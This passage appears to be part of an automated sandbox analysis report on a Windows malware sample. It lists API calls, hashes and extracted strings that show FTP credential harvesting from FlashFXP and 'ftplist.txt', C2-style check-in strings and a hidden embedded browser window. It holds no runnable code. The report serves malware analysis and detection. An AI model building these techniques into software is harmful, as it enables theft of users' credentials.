                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                                                                                                                                                                                                                • String ID: hOA
                                                                                                                                                                                                                • API String ID: 1355009786-3485425990
                                                                                                                                                                                                                • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                                • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                                                • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                                                                                                                                                                                                                • API String ID: 536389180-1762329985
                                                                                                                                                                                                                • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                                                                                                                                                                                                                • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409359
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409362
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004093B8
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$Free$Alloc$CharLower
                                                                                                                                                                                                                • String ID: http:$javascript$+@
                                                                                                                                                                                                                • API String ID: 1987340527-3375436608
                                                                                                                                                                                                                • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                                • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                                                                                                                                                                                                                • API String ID: 3472027048-1081452883
                                                                                                                                                                                                                • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                                                                                                                                                                                                                • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                • String ID: _self$http$+@
                                                                                                                                                                                                                • API String ID: 1473721057-3317424838
                                                                                                                                                                                                                • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                                                                                                                                                                                                                • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$CloseQueryValue
                                                                                                                                                                                                                • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                                                                                                                                                                                                                • API String ID: 3546245721-1332223170
                                                                                                                                                                                                                • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                                • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                                                                                                                                                                                                                • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                                                                                                                                                                                                                  • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                                  • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                                  • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                                                                                                                                                                                                                • String ID: Shell_TrayWnd$eventConn
                                                                                                                                                                                                                • API String ID: 2141107913-3455059086
                                                                                                                                                                                                                • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                                • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404913
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404925
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404935
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404947
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                                                                                                                                                                                                                • API String ID: 1635188419-1322549247
                                                                                                                                                                                                                • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                                • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00407387
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0040738D
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3166187867-0
                                                                                                                                                                                                                • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                                                                                                                                                                                                                • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: http$+@
                                                                                                                                                                                                                • API String ID: 0-4127549746
                                                                                                                                                                                                                • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                                                                                                                                                                                                                • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EnvironmentExpandFolderOpenPathStrings
                                                                                                                                                                                                                • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                                                                                                                                                                                                                • API String ID: 1994525040-4055253781
                                                                                                                                                                                                                • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                                • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004099EB
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004099F9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: </domain>$</url>$<domain>$<url>$http://
                                                                                                                                                                                                                • API String ID: 2525500382-924421446
                                                                                                                                                                                                                • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                                • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(7644F6A0), ref: 00408F82
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                                                                                                                                                                                                                • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040ADA4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$AttemptConnectInternet
                                                                                                                                                                                                                • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                                                                                                                                                                                                                • API String ID: 362191241-2593661552
                                                                                                                                                                                                                • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                                                                                                                                                                                                                • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                                                                                                                                                                                                                • __FindPESection.LIBCMT ref: 0040D8AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
